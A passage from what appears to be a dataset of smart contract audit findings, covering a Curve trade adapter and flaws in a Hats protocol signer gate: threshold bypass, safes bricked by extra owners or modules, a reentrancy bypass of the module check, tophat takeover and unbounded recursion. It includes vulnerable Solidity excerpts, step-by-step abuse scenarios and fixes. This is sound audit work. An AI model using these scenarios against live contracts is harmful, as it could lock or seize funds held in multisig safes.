The first pool might have lesser liquidity, larger slippage, and higher fee than the other pools, resulting in the trade returning lesser assets than expected.\\nWhen performing a trade via the `CurveAdapter._exactInSingle` function, it will call the `CURVE_REGISTRY.find_pool_for_coins` function to find the available pools for exchanging two coins.\\n```\\nFile: CurveAdapter.sol\\n function _exactInSingle(Trade memory trade)\\n internal view returns (address target, bytes memory executionCallData)\\n {\\n address sellToken = _getTokenAddress(trade.sellToken);\\n address buyToken = _getTokenAddress(trade.buyToken);\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken));\\n\\n if (address(pool) == address(0)) revert InvalidTrade();\\n\\n int128 i = -1;\\n int128 j = -1;\\n for (int128 c = 0; c < MAX_TOKENS; c++) {\\n address coin = pool.coins(uint256(int256(c)));\\n if (coin == sellToken) i = c;\\n if (coin == buyToken) j = c;\\n if (i > -1 && j > -1) break;\\n }\\n\\n if (i == -1 || j == -1) revert InvalidTrade();\\n\\n return (\\n address(pool),\\n abi.encodeWithSelector(\\n ICurvePool.exchange.selector,\\n i,\\n j,\\n trade.amount,\\n trade.limit\\n )\\n );\\n }\\n```\\n\\nHowever, it was observed that when multiple pools are available, users can choose the pool to return by defining the `i` parameter of the `find_pool_for_coins` function as shown below.\\n```\\n@view\\n@external\\ndef find_pool_for_coins(_from: address, _to: address, i: uint256 = 0) -> address:\\n \"\"\"\\n @notice Find an available pool for exchanging two coins\\n @param _from Address of coin to be sent\\n @param _to Address of coin to be received\\n @param i Index value. 
When multiple pools are available\\n this value is used to return the n'th address.\\n @return Pool address\\n \"\"\"\\n key: uint256 = bitwise_xor(convert(_from, uint256), convert(_to, uint256))\\n return self.markets[key][i]\\n```\\n\\nHowever, the `CurveAdapter._exactInSingle` did not allow users to define the `i` parameter of the `find_pool_for_coins` function. As a result, users are forced to trade against the first pool returned by the Curve Registry.чIf multiple pools support the exchange, consider allowing the users to choose which pool they want to trade against.\\n```\\nfunction _exactInSingle(Trade memory trade)\\n internal view returns (address target, bytes memory executionCallData)\\n{\\n address sellToken = _getTokenAddress(trade.sellToken);\\n address buyToken = _getTokenAddress(trade.buyToken);\\n// Remove the line below\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken));\\n// Add the line below\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken, trade.pool_index)); \\n```\\nчThe first pool returned by Curve Registry might not be the most optimal pool to trade with. 
The first pool might have lesser liquidity, larger slippage, and higher fee than the other pools, resulting in the trade returning lesser assets than expected.ч```\\nFile: CurveAdapter.sol\\n function _exactInSingle(Trade memory trade)\\n internal view returns (address target, bytes memory executionCallData)\\n {\\n address sellToken = _getTokenAddress(trade.sellToken);\\n address buyToken = _getTokenAddress(trade.buyToken);\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken));\\n\\n if (address(pool) == address(0)) revert InvalidTrade();\\n\\n int128 i = -1;\\n int128 j = -1;\\n for (int128 c = 0; c < MAX_TOKENS; c++) {\\n address coin = pool.coins(uint256(int256(c)));\\n if (coin == sellToken) i = c;\\n if (coin == buyToken) j = c;\\n if (i > -1 && j > -1) break;\\n }\\n\\n if (i == -1 || j == -1) revert InvalidTrade();\\n\\n return (\\n address(pool),\\n abi.encodeWithSelector(\\n ICurvePool.exchange.selector,\\n i,\\n j,\\n trade.amount,\\n trade.limit\\n )\\n );\\n }\\n```\\n -Signers can bypass checks and change threshold within a transactionчhighчThe `checkAfterExecution()` function has checks to ensure that the safe's threshold isn't changed by a transaction executed by signers. However, the parameters used by the check can be changed midflight so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors. From the docs:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nHowever, the restriction that the signers cannot change the threshold can be violated.\\nTo see how this is possible, let's check how this invariant is upheld. 
The following check is performed within the function:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n\\nIf we look up `_getCorrectThreshold()`, we see the following:\\n```\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nAs we can see, this means that the safe's threshold after the transaction must equal the valid signers, bounded by the `minThreshold` and `maxThreshold`.\\nHowever, this check does not ensure that the value returned by `_getCorrectThreshold()` is the same before and after the transaction. As a result, as long as the number of owners is also changed in the transaction, the condition can be upheld.\\nTo illustrate, let's look at an example:\\nBefore the transaction, there are 8 owners on the vault, all signers. targetThreshold == 10 and minThreshold == 2, so the safe's threshold is 8 and everything is good.\\nThe transaction calls `removeOwner()`, removing an owner from the safe and adjusting the threshold down to 7.\\nAfter the transaction, there will be 7 owners on the vault, all signers, the safe's threshold will be 7, and the check will pass.\\nThis simple example focuses on using `removeOwner()` once to decrease the threshold. 
However, it is also possible to use the safe's multicall functionality to call `removeOwner()` multiple times, changing the threshold more dramatically.чSave the safe's current threshold in `checkTransaction()` before the transaction has executed, and compare the value after the transaction to that value from storage.чSigners can change the threshold of the vault, giving themselves increased control over future transactions and breaking an important trust assumption of the protocol.ч```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n -HatsSignerGate + MultiHatsSignerGate: more than maxSignatures can be claimed which leads to DOS in reconcileSignerCountчhighчThe `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions allow users to become signers.\\nIt is important that both functions do not allow that there exist more valid signers than `maxSigners`.\\nThis is because if there are more valid signers than `maxSigners`, any call to `HatsSignerGateBase.reconcileSignerCount` reverts, which means that no transactions can be executed.\\nThe only possibility to resolve this is for a valid signer to give up his signer hat. No signer will voluntarily give up his signer hat. And it is wrong that a signer must give it up. Valid signers that have claimed before `maxSigners` was reached should not be affected by someone trying to become a signer and exceeding `maxSigners`. In other words the situation where one of the signers needs to give up his signer hat should have never occurred in the first place.\\nThink of the following scenario:\\n`maxSignatures=10` and there are 10 valid signers\\nThe signers execute a transaction that calls `Safe.addOwnerWithThreshold` such that there are now 11 owners (still there are 10 valid signers)\\nOne of the 10 signers is no longer a wearer of the hat and `reconcileSignerCount` is called. 
So there are now 9 valid signers and 11 owners\\nThe signer that was no longer a wearer of the hat in the previous step now wears the hat again. However `reconcileSignerCount` is not called. So there are 11 owners and 10 valid signers. The HSG however still thinks there are 9 valid signers.\\nWhen a new signer now calls `claimSigner`, all checks will pass and he will be swapped for the owner that is not a valid signer:\\n```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n\\nSo there are now 11 owners and 11 valid signers. This means when `reconcileSignerCount` is called, the following lines cause a revert:\\n```\\n function reconcileSignerCount() public {\\n address[] memory owners = safe.getOwners();\\n uint256 validSignerCount = _countValidSigners(owners);\\n\\n // 11 > 10\\n if (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n }\\n```\\nчThe `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions should call `reconcileSignerCount` such that they work with the correct amount of signers and the scenario described in this report cannot occur.\\n```\\ndiff --git a/src/HatsSignerGate.sol b/src/HatsSignerGate.sol\\nindex 7a02faa..949d390 100644\\n--- a/src/HatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/HatsSignerGate.sol\\n@@ -34,6 // Add the line below\\n34,8 @@ contract HatsSignerGate is HatsSignerGateBase {\\n /// @notice Function to become an owner on the safe if you are wearing the signers hat\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. 
Swaps caller with existing invalid owner if relevant.\\n function claimSigner() public virtual {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n\\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n\\n```\\ndiff --git a/src/MultiHatsSignerGate.sol b/src/MultiHatsSignerGate.sol\\nindex da74536..57041f6 100644\\n--- a/src/MultiHatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/MultiHatsSignerGate.sol\\n@@ -39,6 // Add the line below\\n39,8 @@ contract MultiHatsSignerGate is HatsSignerGateBase {\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n /// @param _hatId The hat id to claim signer rights for\\n function claimSigner(uint256 _hatId) public {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n \\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\nчAs mentioned before, we end up in a situation where one of the valid signers has to give up his signer hat in order for the HSG to become operable again.\\nSo one of the valid signers that has rightfully claimed his spot as a signer may lose his privilege to sign transactions.ч```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n -Signers can brick safe by adding unlimited additional signers while avoiding checksчhighчThere are a number of checks in `checkAfterExecution()` to ensure that the signers cannot perform any illegal actions to exert too much control over the 
safe. However, there is no check to ensure that additional owners are not added to the safe. This could be done in a way that pushes the total over `maxSigners`, which will cause all future transactions to revert.\\nThis means that signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nWhen new owners are added to the contract through the `claimSigner()` function, the total number of owners is compared to `maxSigners` to ensure it doesn't exceed it.\\nHowever, owners can also be added by a normal `execTransaction` function. In this case, there are very few checks (all of which could easily or accidentally be missed) to stop us from adding too many owners:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nThat means that either in the case that (a) the safe's threshold is already at `targetThreshold` or (b) the owners being added are currently toggled off or have eligibility turned off, this check will pass and the owners will be added.\\nOnce they are added, all future transactions will fail. Each time a transaction is processed, `checkTransaction()` is called, which calls `reconcileSignerCount()`, which has the following check:\\n```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n\\nThis will revert as long as the new owners are now activated as valid signers.\\nIn the worst case scenario, valid signers wearing an immutable hat are added as owners when the safe's threshold is already above `targetThreshold`. 
The check passes, but the new owners are already valid signers. There is no admin action that can revoke the validity of their hats, so the `reconcileSignerCount()` function will always revert, and therefore the safe is unusable.\\nSince `maxSigners` is immutable and can't be changed, the only solution is for the hat wearers to renounce their hats. Otherwise, the safe will remain unusable with all funds trapped inside.чThere should be a check in `checkAfterExecution()` that ensures that the number of owners on the safe has not changed throughout the execution.\\nIt also may be recommended that the `maxSigners` value is adjustable by the contract owner.чSigners can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nIn a less malicious case, signers might accidentally add too many owners and end up needing to manage the logistics of having users renounce their hats.ч```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n -Other module can add owners to safe that push us above maxSigners, bricking safeчhighчIf another module adds owners to the safe, these additions are not checked by our module or guard's logic. This can result in pushing us over `maxSigners`, which will cause all transactions to revert. 
In the case of an immutable hat, the only way to avoid the safe being locked permanently (with all funds frozen) may be to convince many hat wearers to renounce their hats.\\nWhen new owners are added to the contract through the `claimSigner()` function, the total number of owners is compared to `maxSigners` to ensure it doesn't exceed it.\\nHowever, if there are other modules on the safe, they are able to add additional owners without these checks.\\nIn the case of `HatsSignerGate.sol`, there is no need to call `claimSigner()` to \"activate\" these owners. They will automatically be valid as long as they are a wearer of the correct hat.\\nThis could lead to an issue where many (more than maxSigners) wearers of an immutable hat are added to the safe as owners. Now, each time a transaction is processed, `checkTransaction()` is called, which calls `reconcileSignerCount()`, which has the following check:\\n```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n\\nThis will revert.\\nWorse, there is nothing the admin can do about it. 
If they don't have control over the eligibility address for the hat, they are not able to burn the hats or transfer them.\\nThe safe will be permanently bricked and unable to perform transactions unless the hat wearers agree to renounce their hats.чIf `validSignerCount > maxSigners`, there should be some mechanism to reduce the number of signers rather than reverting.\\nAlternatively, as suggested in another issue, to get rid of all the potential risks of having other modules able to make changes outside of your module's logic, we should create the limit that the HatsSignerGate module can only exist on a safe with no other modules.чThe safe can be permanently bricked and unable to perform transactions unless the hat wearers agree to renounce their hats.ч```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n -If another module adds a module, the safe will be brickedчhighчIf a module is added by another module, it will bypass the `enableNewModule()` function that increments `enabledModuleCount`. This will throw off the module validation in `checkTransaction()` and `checkAfterExecution()` and could cause the safe to become permanently bricked.\\nIn order to ensure that signers cannot add new modules to the safe (thus giving them unlimited future governing power), the guard portion of the gate checks that the hash of the modules before the transaction is the same as the hash after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nYou'll note that the \"before\" check uses `enabledModuleCount` and the \"after\" check uses `enabledModuleCount + 1`. 
The reason for this is that we want to be able to catch whether the user added a new module, which requires us taking a larger pagination to make sure we can view the additional module.\\nHowever, if we were to start with a number of modules larger than `enabledModuleCount`, the result would be that the \"before\" check would clip off the final modules, and the \"after\" check would include them, thus leading to different hashes.\\nThis situation can only arise if a module is added that bypasses the `enableModule()` function. But this exact situation can happen if one of the other modules on the safe adds a module to the safe.\\nIn this case, the modules on the safe will increase but `enabledModuleCount` will not. This will lead to the \"before\" and \"after\" checks returning different arrays each time, and therefore disallowing transactions.\\nThe only possible ways to fix this problem will be to have the other module remove the additional one they added. But, depending on the specific circumstances, this option may not be possible. For example, the module that performed the adding may not have the ability to remove modules.чThe module guarding logic needs to be rethought. Given the large number of unbounded risks it opens up, I would recommend not allowing other modules on any safes that use this functionality.чThe safe can be permanently bricked, with the guard functions disallowing any transactions. All funds in the safe will remain permanently stuck.ч```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n -Signers can bypass checks to add new modules to a safe by abusing reentrancyчhighчThe `checkAfterExecution()` function has checks to ensure that new modules cannot be added by signers. This is a crucial check, because adding a new module could give them unlimited power to make any changes (with no guards in place) in the future. 
However, by abusing reentrancy, the parameters used by the check can be changed so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors, the most important of which is adding new modules. This was an issue caught in the previous audit and fixed by comparing the hash of the modules before execution to the hash of the modules after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nThis is further emphasized in the comments, where it is specified:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nWhy Restricting Modules is Important\\nModules are the most important thing to check. This is because modules have unlimited power not only to execute transactions but to skip checks in the future. Creating an arbitrary new module is so bad that it is equivalent to the other two issues together: getting complete control over the safe (as if threshold was set to 1) and removing the guard (because they aren't checked in module transactions).\\nHowever, this important restriction can be violated by abusing reentrancy into this function.\\nReentrancy Dysfunction\\nTo see how this is possible, we first have to take a quick detour regarding reentrancy. It appears that the protocol is attempting to guard against reentrancy with the `guardEntries` variable.
It is incremented in `checkTransaction()` (before a transaction is executed) and decremented in `checkAfterExecution()` (after the transaction has completed).\\nThe only protection it provides is in its risk of underflowing, explained in the comments as:\\n// leave checked to catch underflows triggered by re-erntry attempts\\nHowever, any attempt to reenter and send an additional transaction midstream of another transaction would first trigger the `checkTransaction()` function. This would increment `_guardEntries` and would lead to it not underflowing.\\nIn order for this system to work correctly, the `checkTransaction()` function should simply set `_guardEntries = 1`. This would result in an underflow with the second decrement. But, as it is currently designed, there is no reentrancy protection.\\nUsing Reentrancy to Bypass Module Check\\nRemember that the module invariant is upheld by taking a snapshot of the hash of the modules in `checkTransaction()` and saving it in the `_existingModulesHash` variable.\\nHowever, imagine the following set of transactions:\\nSigners send a transaction via the safe, and modules are snapshotted to `_existingModulesHash`\\nThe transaction uses the Multicall functionality of the safe, and performs the following actions:\\nFirst, it adds the malicious module to the safe\\nThen, it calls `execTransaction()` on itself with any another transaction\\nThe second call will call `checkTransaction()`\\nThis will update `_existingModulesHash` to the new list of modules, including the malicious one\\nThe second call will execute, which doesn't matter (could just be an empty transaction)\\nAfter the transaction, `checkAfterExecution()` will be called, and the modules will match\\nAfter the full transaction is complete, `checkAfterExecution()` will be called for the first transaction, but since `_existingModulesHash` will be overwritten, the module check will passчUse a more typical reentrancy guard format, such as checking to ensure 
`_guardEntries == 0` at the top of `checkTransaction()` or simply setting `_guardEntries = 1` in `checkTransaction()` instead of incrementing it.чAny number of signers who are above the threshold will be able to give themselves unlimited access over the safe with no restriction going forward.ч```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n -Unlinked tophat retains linkedTreeRequests, can be ruggedчhighчWhen a tophat is unlinked from its admin, it is intended to regain its status as a tophat that is fully self-sovereign. However, because the `linkedTreeRequests` value isn't deleted, an independent tophat could still be vulnerable to \"takeover\" from another admin and could lose its sovereignty.\\nFor a tophat to get linked to a new tree, it calls `requestLinkTopHatToTree()` function:\\n```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n\\nThis creates a \"request\" to link to a given admin, which can later be approved by the admin in question:\\n```\\nfunction approveLinkTopHatToTree(uint32 _topHatDomain, uint256 _newAdminHat) external {\\n // for everything but the last hat level, check the admin of `_newAdminHat`'s theoretical child hat, since either wearer or admin of `_newAdminHat` can approve\\n if (getHatLevel(_newAdminHat) < MAX_LEVELS) {\\n _checkAdmin(buildHatId(_newAdminHat, 1));\\n } else {\\n // the above buildHatId trick doesn't work for the last hat level, so we need to explicitly check both admin and wearer in this case\\n _checkAdminOrWearer(_newAdminHat);\\n }\\n\\n // Linkages must be initiated by a request\\n if (_newAdminHat 
!= linkedTreeRequests[_topHatDomain]) revert LinkageNotRequested();\\n\\n // remove the request -- ensures all linkages are initialized by unique requests,\\n // except for relinks (see `relinkTopHatWithinTree`)\\n delete linkedTreeRequests[_topHatDomain];\\n\\n // execute the link. Replaces existing link, if any.\\n _linkTopHatToTree(_topHatDomain, _newAdminHat);\\n}\\n```\\n\\nThis function shows that if there is a pending `linkedTreeRequests`, then the admin can use that to link the tophat into their tree and claim authority over it.\\nWhen a tophat is unlinked, it is expected to regain its sovereignty:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n\\nHowever, this function does not delete `linkedTreeRequests`.\\nTherefore, the following set of actions is possible:\\nTopHat is linked to Admin A\\nAdmin A agrees to unlink the tophat\\nAdmin A calls `requestLinkTopHatToTree` with any address as the admin\\nThis call succeeds because Admin A is currently an admin for TopHat\\nAdmin A unlinks TopHat as promised\\nIn the future, the address chosen can call `approveLinkTopHatToTree` and take over admin controls for the TopHat without the TopHat's permissionчIn `unlinkTopHatFromTree()`, the `linkedTreeRequests` should be deleted:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n// Add the line below\\n delete linkedTreeRequests[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\nчTophats that expect to be fully self-sovereign and without any oversight can be surprisingly claimed by another admin, because settings from a previous 
admin remain through unlinking.ч```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n -Owners can be swapped even though they still wear their signer hatsчmediumч`HatsSignerGateBase` does not check for a change of owners post-flight. This allows a group of actors to collude and replace opposing signers with cooperating signers, even though the replaced signers still wear their signer hats.\\nThe `HatsSignerGateBase` performs various checks to prevent a multisig transaction from tampering with certain variables. Something that is currently not checked for in `checkAfterExecution` is a change of owners. A colluding group of malicious signers could abuse this to perform swaps of safe owners by using a delegate call to a corresponding malicious contract.
This would bypass the requirement of only being able to replace an owner if he does not wear his signer hat anymore as used in _swapSigner:\\n```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n \"swapOwner(address,address,address)\",\\n // rest of code\\n```\\nчIssue Owners can be swapped even though they still wear their signer hats\\nPerform a pre- and post-flight comparison on the safe owners, analogous to what is currently done with the modules.чbypass restrictions and perform actions that should be disallowed.ч```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n \"swapOwner(address,address,address)\",\\n // rest of code\\n```\\n -Unbound recursive function call can use unlimited gas and break hats operationчmediumчSome of the functions in the Hats and HatsIdUtilities contracts have recursive logic without limiting the number of iterations; this can cause unlimited gas usage if hat trees have a huge depth, and it won't be possible to call the contracts' functions.
functions `getImageURIForHat()`, `isAdminOfHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` would revert and because most of the logics callings those functions so contract would be in broken state for those hats.\\nThis is function `isAdminOfHat()` code:\\n```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer 
of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n\\nAs you can see, this function calls itself recursively to check whether the user is a wearer of one of the hat's upper linked hats. If the chain (depth) of the hats in the tree becomes very long, then this function would revert because of the gas usage, and the gas usage would be high enough that it won't be possible to call this function in a transaction. The functions `getImageURIForHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` have similar issues, and their gas usage depends on the tree depth. The issue can happen suddenly for hats if the top-level topHat decides to add a link, for example:\\nHat1 is linked to a chain of hats that has 1000 \"root hats\" and the topHat (tippy hat) is TIPHat1.\\nHat2 is linked to a chain of hats that has 1000 \"root hats\" and the topHat (tippy hat) is TIPHat2.\\nThe admin of TIPHat1 decides to link it to Hat2, and after performing that, the total depth of the tree would increase to 2000 and transactions would cost twice as much gas.чThe code should check and make sure that hat trees have a maximum depth, and should not allow actions when this limit is breached.
(keep depth of each tophat's tree and update it when actions happens and won't allow actions if they increase depth higher than the threshold)чit won't be possible to perform actions for those hats and funds can be lost because of it.ч```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if 
